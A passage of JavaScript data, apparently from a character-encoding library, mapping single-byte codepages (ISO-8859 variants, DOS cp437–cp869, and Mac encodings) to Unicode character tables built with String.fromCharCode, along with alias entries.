        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 3585, 3586, 3587, 3588, 3589, 3590, 3591, 3592, 3593, 3594, 3595, 3596, 3597, 3598, 3599, 3600, 3601, 3602, 3603, 3604, 3605, 3606, 3607, 3608, 3609, 3610, 3611, 3612, 3613, 3614, 3615, 3616, 3617, 3618, 3619, 3620, 3621, 3622, 3623, 3624, 3625, 3626, 3627, 3628, 3629, 3630, 3631, 3632, 3633, 3634, 3635, 3636, 3637, 3638, 3639, 3640, 3641, 3642, 65533, 65533, 65533, 65533, 3647, 3648, 3649, 3650, 3651, 3652, 3653, 3654, 3655, 3656, 3657, 3658, 3659, 3660, 3661, 3662, 3663, 3664, 3665, 3666, 3667, 3668, 3669, 3670, 3671, 3672, 3673, 3674, 3675, 65533, 65533, 65533, 65533)
    },
    "cp28601": "iso885911",
    "iso885913": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 8221, 162, 163, 164, 8222, 166, 167, 216, 169, 342, 171, 172, 173, 174, 198, 176, 177, 178, 179, 8220, 181, 182, 183, 248, 185, 343, 187, 188, 189, 190, 230, 260, 302, 256, 262, 196, 197, 280, 274, 268, 201, 377, 278, 290, 310, 298, 315, 352, 323, 325, 211, 332, 213, 214, 215, 370, 321, 346, 362, 220, 379, 381, 223, 261, 303, 257, 263, 228, 229, 281, 275, 269, 233, 378, 279, 291, 311, 299, 316, 353, 324, 326, 243, 333, 245, 246, 247, 371, 322, 347, 363, 252, 380, 382, 8217)
    },
    "cp28603": "iso885913",
    "iso885914": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 7682, 7683, 163, 266, 267, 7690, 167, 7808, 169, 7810, 7691, 7922, 173, 174, 376, 7710, 7711, 288, 289, 7744, 7745, 182, 7766, 7809, 7767, 7811, 7776, 7923, 7812, 7813, 7777, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 372, 209, 210, 211, 212, 213, 214, 7786, 216, 217, 218, 219, 220, 221, 374, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 373, 241, 242, 243, 244, 245, 246, 7787, 248, 249, 250, 251, 252, 253, 375, 255)
    },
    "cp28604": "iso885914",
    "iso885915": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 8364, 165, 352, 167, 353, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 381, 181, 182, 183, 382, 185, 186, 187, 338, 339, 376, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255)
    },
    "cp28605": "iso885915",
    "iso885916": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 261, 321, 8364, 8222, 352, 167, 353, 169, 536, 171, 377, 173, 378, 379, 176, 177, 268, 322, 381, 8221, 182, 183, 382, 269, 537, 187, 338, 339, 376, 380, 192, 193, 194, 258, 196, 262, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 272, 323, 210, 211, 212, 336, 214, 346, 368, 217, 218, 219, 220, 280, 538, 223, 224, 225, 226, 259, 228, 263, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 273, 324, 242, 243, 244, 337, 246, 347, 369, 249, 250, 251, 252, 281, 539, 255)
    },
    "cp28606": "iso885916",
    "cp437": {
        "type": "singlebyte",
        "chars": String.fromCharCode(199, 252, 233, 226, 228, 224, 229, 231, 234, 235, 232, 239, 238, 236, 196, 197, 201, 230, 198, 244, 246, 242, 251, 249, 255, 214, 220, 162, 163, 165, 8359, 402, 225, 237, 243, 250, 241, 209, 170, 186, 191, 8976, 172, 189, 188, 161, 171, 187, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 945, 223, 915, 960, 931, 963, 181, 964, 934, 920, 937, 948, 8734, 966, 949, 8745, 8801, 177, 8805, 8804, 8992, 8993, 247, 8776, 176, 8729, 183, 8730, 8319, 178, 9632, 160)
    },
    "ibm437": "cp437",
    "cp737": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 931, 932, 933, 934, 935, 936, 937, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 963, 962, 964, 965, 966, 967, 968, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 969, 940, 941, 942, 970, 943, 972, 973, 971, 974, 902, 904, 905, 906, 908, 910, 911, 177, 8805, 8804, 938, 939, 247, 8776, 176, 8729, 183, 8730, 8319, 178, 9632, 160)
    },
    "ibm737": "cp737",
    "cp775": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(262, 252, 233, 257, 228, 291, 229, 263, 322, 275, 342, 343, 299, 377, 196, 197, 201, 230, 198, 333, 246, 290, 162, 346, 347, 214, 220, 248, 163, 216, 215, 164, 256, 298, 243, 379, 380, 378, 8221, 166, 169, 174, 172, 189, 188, 321, 171, 187, 9617, 9618, 9619, 9474, 9508, 260, 268, 280, 278, 9571, 9553, 9559, 9565, 302, 352, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 370, 362, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 381, 261, 269, 281, 279, 303, 353, 371, 363, 382, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 211, 223, 332, 323, 245, 213, 181, 324, 310, 311, 315, 316, 326, 274, 325, 8217, 173, 177, 8220, 190, 182, 167, 247, 8222, 176, 8729, 183, 185, 179, 178, 9632, 160)
    },
    "ibm775": "cp775",
    "cp850": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(199, 252, 233, 226, 228, 224, 229, 231, 234, 235, 232, 239, 238, 236, 196, 197, 201, 230, 198, 244, 246, 242, 251, 249, 255, 214, 220, 248, 163, 216, 215, 402, 225, 237, 243, 250, 241, 209, 170, 186, 191, 174, 172, 189, 188, 161, 171, 187, 9617, 9618, 9619, 9474, 9508, 193, 194, 192, 169, 9571, 9553, 9559, 9565, 162, 165, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 227, 195, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 164, 240, 208, 202, 203, 200, 305, 205, 206, 207, 9496, 9484, 9608, 9604, 166, 204, 9600, 211, 223, 212, 210, 245, 213, 181, 254, 222, 218, 219, 217, 253, 221, 175, 180, 173, 177, 8215, 190, 182, 167, 247, 184, 176, 168, 183, 185, 179, 178, 9632, 160)
    },
    "ibm850": "cp850",
    "cp852": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(199, 252, 233, 226, 228, 367, 263, 231, 322, 235, 336, 337, 238, 377, 196, 262, 201, 313, 314, 244, 246, 317, 318, 346, 347, 214, 220, 356, 357, 321, 215, 269, 225, 237, 243, 250, 260, 261, 381, 382, 280, 281, 172, 378, 268, 351, 171, 187, 9617, 9618, 9619, 9474, 9508, 193, 194, 282, 350, 9571, 9553, 9559, 9565, 379, 380, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 258, 259, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 164, 273, 272, 270, 203, 271, 327, 205, 206, 283, 9496, 9484, 9608, 9604, 354, 366, 9600, 211, 223, 212, 323, 324, 328, 352, 353, 340, 218, 341, 368, 253, 221, 355, 180, 173, 733, 731, 711, 728, 167, 247, 184, 176, 168, 729, 369, 344, 345, 9632, 160)
    },
    "ibm852": "cp852",
    "cp855": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(1106, 1026, 1107, 1027, 1105, 1025, 1108, 1028, 1109, 1029, 1110, 1030, 1111, 1031, 1112, 1032, 1113, 1033, 1114, 1034, 1115, 1035, 1116, 1036, 1118, 1038, 1119, 1039, 1102, 1070, 1098, 1066, 1072, 1040, 1073, 1041, 1094, 1062, 1076, 1044, 1077, 1045, 1092, 1060, 1075, 1043, 171, 187, 9617, 9618, 9619, 9474, 9508, 1093, 1061, 1080, 1048, 9571, 9553, 9559, 9565, 1081, 1049, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 1082, 1050, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 164, 1083, 1051, 1084, 1052, 1085, 1053, 1086, 1054, 1087, 9496, 9484, 9608, 9604, 1055, 1103, 9600, 1071, 1088, 1056, 1089, 1057, 1090, 1058, 1091, 1059, 1078, 1046, 1074, 1042, 1100, 1068, 8470, 173, 1099, 1067, 1079, 1047, 1096, 1064, 1101, 1069, 1097, 1065, 1095, 1063, 167, 9632, 160)
    },
    "ibm855": "cp855",
    "cp857": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(199, 252, 233, 226, 228, 224, 229, 231, 234, 235, 232, 239, 238, 305, 196, 197, 201, 230, 198, 244, 246, 242, 251, 249, 304, 214, 220, 248, 163, 216, 350, 351, 225, 237, 243, 250, 241, 209, 286, 287, 191, 174, 172, 189, 188, 161, 171, 187, 9617, 9618, 9619, 9474, 9508, 193, 194, 192, 169, 9571, 9553, 9559, 9565, 162, 165, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 227, 195, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 164, 186, 170, 202, 203, 200, 65533, 205, 206, 207, 9496, 9484, 9608, 9604, 166, 204, 9600, 211, 223, 212, 210, 245, 213, 181, 65533, 215, 218, 219, 217, 236, 255, 175, 180, 173, 177, 65533, 190, 182, 167, 247, 184, 176, 168, 183, 185, 179, 178, 9632, 160)
    },
    "ibm857": "cp857",
    "cp858": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(199, 252, 233, 226, 228, 224, 229, 231, 234, 235, 232, 239, 238, 236, 196, 197, 201, 230, 198, 244, 246, 242, 251, 249, 255, 214, 220, 248, 163, 216, 215, 402, 225, 237, 243, 250, 241, 209, 170, 186, 191, 174, 172, 189, 188, 161, 171, 187, 9617, 9618, 9619, 9474, 9508, 193, 194, 192, 169, 9571, 9553, 9559, 9565, 162, 165, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 227, 195, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 164, 240, 208, 202, 203, 200, 8364, 205, 206, 207, 9496, 9484, 9608, 9604, 166, 204, 9600, 211, 223, 212, 210, 245, 213, 181, 254, 222, 218, 219, 217, 253, 221, 175, 180, 173, 177, 8215, 190, 182, 167, 247, 184, 176, 168, 183, 185, 179, 178, 9632, 160)
    },
    "ibm858": "cp858",
    "cp860": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(199, 252, 233, 226, 227, 224, 193, 231, 234, 202, 232, 205, 212, 236, 195, 194, 201, 192, 200, 244, 245, 242, 218, 249, 204, 213, 220, 162, 163, 217, 8359, 211, 225, 237, 243, 250, 241, 209, 170, 186, 191, 210, 172, 189, 188, 161, 171, 187, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 945, 223, 915, 960, 931, 963, 181, 964, 934, 920, 937, 948, 8734, 966, 949, 8745, 8801, 177, 8805, 8804, 8992, 8993, 247, 8776, 176, 8729, 183, 8730, 8319, 178, 9632, 160)
    },
    "ibm860": "cp860",
    "cp861": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(199, 252, 233, 226, 228, 224, 229, 231, 234, 235, 232, 208, 240, 222, 196, 197, 201, 230, 198, 244, 246, 254, 251, 221, 253, 214, 220, 248, 163, 216, 8359, 402, 225, 237, 243, 250, 193, 205, 211, 218, 191, 8976, 172, 189, 188, 161, 171, 187, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 945, 223, 915, 960, 931, 963, 181, 964, 934, 920, 937, 948, 8734, 966, 949, 8745, 8801, 177, 8805, 8804, 8992, 8993, 247, 8776, 176, 8729, 183, 8730, 8319, 178, 9632, 160)
    },
    "ibm861": "cp861",
    "cp862": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(1488, 1489, 1490, 1491, 1492, 1493, 1494, 1495, 1496, 1497, 1498, 1499, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1510, 1511, 1512, 1513, 1514, 162, 163, 165, 8359, 402, 225, 237, 243, 250, 241, 209, 170, 186, 191, 8976, 172, 189, 188, 161, 171, 187, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 945, 223, 915, 960, 931, 963, 181, 964, 934, 920, 937, 948, 8734, 966, 949, 8745, 8801, 177, 8805, 8804, 8992, 8993, 247, 8776, 176, 8729, 183, 8730, 8319, 178, 9632, 160)
    },
    "ibm862": "cp862",
    "cp863": {
        "type": "singlebyte",
        "chars": String.fromCharCode(199, 252, 233, 226, 194, 224, 182, 231, 234, 235, 232, 239, 238, 8215, 192, 167, 201, 200, 202, 244, 203, 207, 251, 249, 164, 212, 220, 162, 163, 217, 219, 402, 166, 180, 243, 250, 168, 184, 179, 175, 206, 8976, 172, 189, 188, 190, 171, 187, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 945, 223, 915, 960, 931, 963, 181, 964, 934, 920, 937, 948, 8734, 966, 949, 8745, 8801, 177, 8805, 8804, 8992, 8993, 247, 8776, 176, 8729, 183, 8730, 8319, 178, 9632, 160)
    },
    "ibm863": "cp863",
    "cp864": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(176, 183, 8729, 8730, 9618, 9472, 9474, 9532, 9508, 9516, 9500, 9524, 9488, 9484, 9492, 9496, 946, 8734, 966, 177, 189, 188, 8776, 171, 187, 65271, 65272, 65533, 65533, 65275, 65276, 65533, 160, 173, 65154, 163, 164, 65156, 65533, 65533, 65166, 65167, 65173, 65177, 1548, 65181, 65185, 65189, 1632, 1633, 1634, 1635, 1636, 1637, 1638, 1639, 1640, 1641, 65233, 1563, 65201, 65205, 65209, 1567, 162, 65152, 65153, 65155, 65157, 65226, 65163, 65165, 65169, 65171, 65175, 65179, 65183, 65187, 65191, 65193, 65195, 65197, 65199, 65203, 65207, 65211, 65215, 65217, 65221, 65227, 65231, 166, 172, 247, 215, 65225, 1600, 65235, 65239, 65243, 65247, 65251, 65255, 65259, 65261, 65263, 65267, 65213, 65228, 65230, 65229, 65249, 65149, 1617, 65253, 65257, 65260, 65264, 65266, 65232, 65237, 65269, 65270, 65245, 65241, 65265, 9632, 65533)
    },
    "ibm864": "cp864",
    "cp865": {
        "type": "singlebyte",
        "chars": String.fromCharCode(199, 252, 233, 226, 228, 224, 229, 231, 234, 235, 232, 239, 238, 236, 196, 197, 201, 230, 198, 244, 246, 242, 251, 249, 255, 214, 220, 248, 163, 216, 8359, 402, 225, 237, 243, 250, 241, 209, 170, 186, 191, 8976, 172, 189, 188, 161, 171, 164, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 945, 223, 915, 960, 931, 963, 181, 964, 934, 920, 937, 948, 8734, 966, 949, 8745, 8801, 177, 8805, 8804, 8992, 8993, 247, 8776, 176, 8729, 183, 8730, 8319, 178, 9632, 160)
    },
    "ibm865": "cp865",
    "cp866": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103, 1025, 1105, 1028, 1108, 1031, 1111, 1038, 1118, 176, 8729, 183, 8730, 8470, 164, 9632, 160)
    },
    "ibm866": "cp866",
    "cp869": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(65533, 65533, 65533, 65533, 65533, 65533, 902, 65533, 183, 172, 166, 8216, 8217, 904, 8213, 905, 906, 938, 908, 65533, 65533, 910, 939, 169, 911, 178, 179, 940, 163, 941, 942, 943, 970, 912, 972, 973, 913, 914, 915, 916, 917, 918, 919, 189, 920, 921, 171, 187, 9617, 9618, 9619, 9474, 9508, 922, 923, 924, 925, 9571, 9553, 9559, 9565, 926, 927, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 928, 929, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 931, 932, 933, 934, 935, 936, 937, 945, 946, 947, 9496, 9484, 9608, 9604, 948, 949, 9600, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 963, 962, 964, 900, 173, 177, 965, 966, 967, 167, 968, 901, 176, 168, 969, 971, 944, 974, 9632, 160)
    },
    "ibm869": "cp869",
    "maccenteuro": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(196, 256, 257, 201, 260, 214, 220, 225, 261, 268, 228, 269, 262, 263, 233, 377, 378, 270, 237, 271, 274, 275, 278, 243, 279, 244, 246, 245, 250, 282, 283, 252, 8224, 176, 280, 163, 167, 8226, 182, 223, 174, 169, 8482, 281, 168, 8800, 291, 302, 303, 298, 8804, 8805, 299, 310, 8706, 8721, 322, 315, 316, 317, 318, 313, 314, 325, 326, 323, 172, 8730, 324, 327, 8710, 171, 187, 8230, 160, 328, 336, 213, 337, 332, 8211, 8212, 8220, 8221, 8216, 8217, 247, 9674, 333, 340, 341, 344, 8249, 8250, 345, 342, 343, 352, 8218, 8222, 353, 346, 347, 193, 356, 357, 205, 381, 382, 362, 211, 212, 363, 366, 218, 367, 368, 369, 370, 371, 221, 253, 311, 379, 321, 380, 290, 711)
    },
    "maccroatian": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(196, 197, 199, 201, 209, 214, 220, 225, 224, 226, 228, 227, 229, 231, 233, 232, 234, 235, 237, 236, 238, 239, 241, 243, 242, 244, 246, 245, 250, 249, 251, 252, 8224, 176, 162, 163, 167, 8226, 182, 223, 174, 352, 8482, 180, 168, 8800, 381, 216, 8734, 177, 8804, 8805, 8710, 181, 8706, 8721, 8719, 353, 8747, 170, 186, 8486, 382, 248, 191, 161, 172, 8730, 402, 8776, 262, 171, 268, 8230, 160, 192, 195, 213, 338, 339, 272, 8212, 8220, 8221, 8216, 8217, 247, 9674, 65533, 169, 8260, 164, 8249, 8250, 198, 187, 8211, 183, 8218, 8222, 8240, 194, 263, 193, 269, 200, 205, 206, 207, 204, 211, 212, 273, 210, 218, 219, 217, 305, 710, 732, 175, 960, 203, 730, 184, 202, 230, 711)
    },
    "maccyrillic": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 8224, 176, 162, 163, 167, 8226, 182, 1030, 174, 169, 8482, 1026, 1106, 8800, 1027, 1107, 8734, 177, 8804, 8805, 1110, 181, 8706, 1032, 1028, 1108, 1031, 1111, 1033, 1113, 1034, 1114, 1112, 1029, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 1035, 1115, 1036, 1116, 1109, 8211, 8212, 8220, 8221, 8216, 8217, 247, 8222, 1038, 1118, 1039, 1119, 8470, 1025, 1105, 1103, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 164)
    },
    "macgreek": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(196, 185, 178, 201, 179, 214, 220, 901, 224, 226, 228, 900, 168, 231, 233, 232, 234, 235, 163, 8482, 238, 239, 8226, 189, 8240, 244, 246, 166, 173, 249, 251, 252, 8224, 915, 916, 920, 923, 926, 928, 223, 174, 169, 931, 938, 167, 8800, 176, 903, 913, 177, 8804, 8805, 165, 914, 917, 918, 919, 921, 922, 924, 934, 939, 936, 937, 940, 925, 172, 927, 929, 8776, 932, 171, 187, 8230, 160, 933, 935, 902, 904, 339, 8211, 8213, 8220, 8221, 8216, 8217, 247, 905, 906, 908, 910, 941, 942, 943, 972, 911, 973, 945, 946, 968, 948, 949, 966, 947, 951, 953, 958, 954, 955, 956, 957, 959, 960, 974, 961, 963, 964, 952, 969, 962, 967, 965, 950, 970, 971, 912, 944, 65533)
    },
    "maciceland": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(196, 197, 199, 201, 209, 214, 220, 225, 224, 226, 228, 227, 229, 231, 233, 232, 234, 235, 237, 236, 238, 239, 241, 243, 242, 244, 246, 245, 250, 249, 251, 252, 221, 176, 162, 163, 167, 8226, 182, 223, 174, 169, 8482, 180, 168, 8800, 198, 216, 8734, 177, 8804, 8805, 165, 181, 8706, 8721, 8719, 960, 8747, 170, 186, 8486, 230, 248, 191, 161, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 192, 195, 213, 338, 339, 8211, 8212, 8220, 8221, 8216, 8217, 247, 9674, 255, 376, 8260, 164, 208, 240, 222, 254, 253, 183, 8218, 8222, 8240, 194, 202, 193, 203, 200, 205, 206, 207, 204, 211, 212, 65533, 210, 218, 219, 217, 305, 710, 732, 175, 728, 729, 730, 184, 733, 731, 711)
    },
    "macroman": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(196, 197, 199, 201, 209, 214, 220, 225, 224, 226, 228, 227, 229, 231, 233, 232, 234, 235, 237, 236, 238, 239, 241, 243, 242, 244, 246, 245, 250, 249, 251, 252, 8224, 176, 162, 163, 167, 8226, 182, 223, 174, 169, 8482, 180, 168, 8800, 198, 216, 8734, 177, 8804, 8805, 165, 181, 8706, 8721, 8719, 960, 8747, 170, 186, 8486, 230, 248, 191, 161, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 192, 195, 213, 338, 339, 8211, 8212, 8220, 8221, 8216, 8217, 247, 9674, 255, 376, 8260, 164, 8249, 8250, 64257, 64258, 8225, 183, 8218, 8222, 8240, 194, 202, 193, 203, 200, 205, 206, 207, 204, 211, 212, 65533, 210, 218, 219, 217, 305, 710, 732, 175, 728, 729, 730, 184, 733, 731, 711)
    },
    "macromania": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(196, 197, 199, 201, 209, 214, 220, 225, 224, 226, 228, 227, 229, 231, 233, 232, 234, 235, 237, 236, 238, 239, 241, 243, 242, 244, 246, 245, 250, 249, 251, 252, 8224, 176, 162, 163, 167, 8226, 182, 223, 174, 169, 8482, 180, 168, 8800, 258, 350, 8734, 177, 8804, 8805, 165, 181, 8706, 8721, 8719, 960, 8747, 170, 186, 8486, 259, 351, 191, 161, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 192, 195, 213, 338, 339, 8211, 8212, 8220, 8221, 8216, 8217, 247, 9674, 255, 376, 8260, 164, 8249, 8250, 354, 355, 8225, 183, 8218, 8222, 8240, 194, 202, 193, 203, 200, 205, 206, 207, 204, 211, 212, 65533, 210, 218, 219, 217, 305, 710, 732, 175, 728, 729, 730, 184, 733, 731, 711)
    },
    "macthai": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(171, 187, 8230, 63628, 63631, 63634, 63637, 63640, 63627, 63630, 63633, 63636, 63639, 8220, 8221, 63641, 65533, 8226, 63620, 63625, 63621, 63622, 63623, 63624, 63626, 63629, 63632, 63635, 63638, 8216, 8217, 65533, 160, 3585, 3586, 3587, 3588, 3589, 3590, 3591, 3592, 3593, 3594, 3595, 3596, 3597, 3598, 3599, 3600, 3601, 3602, 3603, 3604, 3605, 3606, 3607, 3608, 3609, 3610, 3611, 3612, 3613, 3614, 3615, 3616, 3617, 3618, 3619, 3620, 3621, 3622, 3623, 3624, 3625, 3626, 3627, 3628, 3629, 3630, 3631, 3632, 3633, 3634, 3635, 3636, 3637, 3638, 3639, 3640, 3641, 3642, 65279, 8203, 8211, 8212, 3647, 3648, 3649, 3650, 3651, 3652, 3653, 3654, 3655, 3656, 3657, 3658, 3659, 3660, 3661, 8482, 3663, 3664, 3665, 3666, 3667, 3668, 3669, 3670, 3671, 3672, 3673, 174, 169, 65533, 65533, 65533, 65533)
    },
    "macturkish": {
        "type": "singlebyte",
        "chars": String.fromCharCode(196, 197, 199, 201, 209, 214, 220, 225, 224, 226, 228, 227, 229, 231, 233, 232, 234, 235, 237, 236, 238, 239, 241, 243, 242, 244, 246, 245, 250, 249, 251, 252, 8224, 176, 162, 163, 167, 8226, 182, 223, 174, 169, 8482, 180, 168, 8800, 198, 216, 8734, 177, 8804, 8805, 165, 181, 8706, 8721, 8719, 960, 8747, 170, 186, 8486, 230, 248, 191, 161, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 192, 195, 213, 338, 339, 8211, 8212, 8220, 8221, 8216, 8217, 247, 9674, 255, 376, 286, 287, 304, 305, 350, 351, 8225, 183, 8218, 8222, 8240, 194, 202, 193, 203, 200, 205, 206, 207, 204, 211, 212, 65533, 210, 218, 219, 217, 65533, 710, 732, 175, 728, 729, 730, 184, 733, 731, 711)
    },
    "macukraine": {
        "type": "singlebyte",
